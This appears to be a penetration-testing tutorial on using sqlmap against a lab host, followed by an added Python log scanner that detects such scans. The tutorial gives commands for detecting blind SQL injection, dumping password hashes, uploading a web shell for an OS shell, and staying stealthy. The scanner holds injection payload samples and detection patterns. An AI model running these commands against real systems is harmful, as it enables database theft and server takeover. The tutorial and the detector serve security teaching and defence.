Automating SQL Injection with sqlmap

Published on March 26, 2025


Manual SQL injection attacks can be automated using sqlmap, a powerful tool included in Kali Linux. It detects and exploits injection points, dumps databases, and even opens OS shells.

Basic Scan Example

To begin scanning a target URL, specify the vulnerable parameter:

sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user

In this case, sqlmap quickly detects a time-based blind SQLi vulnerability and reports the server, application, and DBMS details it fingerprints.

Dumping Data from the Database

Use the --dump flag to extract database content:

sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user --dump

This command extracts usernames, password hashes, and other sensitive fields from vulnerable tables.

Intercepting POST Requests

When targeting a POST request, intercept it with Burp and save it to a file (e.g., post.txt):

POST /search.php HTTP/1.1
Host: 192.168.50.19
...
item=test

Gaining Shell Access

sqlmap can also upload a web shell for OS-level access if the web root is writable:

sqlmap -r post.txt -p item --os-shell --web-root="/var/www/html/tmp"

After uploading a backdoor, sqlmap provides an interactive shell:

os-shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Stealth Consideration

sqlmap is noisy by nature. It should be avoided in stealth operations unless tuned carefully with delay and throttle options.
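That noise is also what a defender can key on. The following is an added example, not part of the original post: a small Python script that scans Apache/Nginx "combined" access-log lines for the traces a run like the one above leaves (the default sqlmap User-Agent, time-based and boolean probes such as SLEEP()/BENCHMARK()/AND 1=1 in the query string, and a burst of such probes from one source). The parser, signature list, flag names and sample log lines are all constructed for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Apache "combined" log line (parser written for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'\d+ \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Probes a time-based or boolean-based blind scan sends (checked on the decoded query).
PAYLOAD_RE = re.compile(
    r"\bSLEEP\s*\(|\bBENCHMARK\s*\(|\bWAITFOR\s+DELAY\b|\bPG_SLEEP\s*\(|\b(AND|OR)\s+\d+\s*=\s*\d+",
    re.IGNORECASE,
)

# Constructed sample log: one benign visitor, then traffic shaped like the scan above.
SAMPLE_LOG = """\
192.168.50.5 - - [26/Mar/2025:10:00:01 +0000] "GET /blindsqli.php?user=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.50.99 - - [26/Mar/2025:10:00:02 +0000] "GET /blindsqli.php?user=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.50.99 - - [26/Mar/2025:10:00:03 +0000] "GET /blindsqli.php?user=1%27%20AND%20SLEEP%285%29--%20 HTTP/1.1" 200 512 "-" "sqlmap/1.9 (https://sqlmap.org)"
192.168.50.99 - - [26/Mar/2025:10:00:08 +0000] "GET /blindsqli.php?user=1%20AND%20BENCHMARK%285000000%2CMD5%281%29%29 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.50.99 - - [26/Mar/2025:10:00:13 +0000] "GET /blindsqli.php?user=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

def analyze(log_text, burst_threshold=3):
    """Per source IP: request count, sqlmap User-Agent hits, payload hits and the flags raised."""
    stats = defaultdict(lambda: {"requests": 0, "ua_hits": 0, "payload_hits": 0, "flags": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # tolerate malformed lines instead of aborting the whole run
        s = stats[m["ip"]]
        s["requests"] += 1
        if "sqlmap" in m["ua"].lower():  # default User-Agent unless --random-agent is used
            s["ua_hits"] += 1
        if PAYLOAD_RE.search(unquote_plus(m["path"].partition("?")[2])):
            s["payload_hits"] += 1
    for s in stats.values():
        if s["ua_hits"]:
            s["flags"].add("sqlmap-user-agent")
        if s["payload_hits"]:
            s["flags"].add("blind-sqli-payload")
        if s["payload_hits"] >= burst_threshold:  # many probes from one source = automated scan
            s["flags"].add("automated-burst")
    return dict(stats)

if __name__ == "__main__":
    for ip, s in analyze(SAMPLE_LOG).items():
        print(ip, sorted(s["flags"]))
```

The User-Agent check only catches untuned runs; the payload and burst checks are what still fire once the scanner is throttled or given a browser User-Agent.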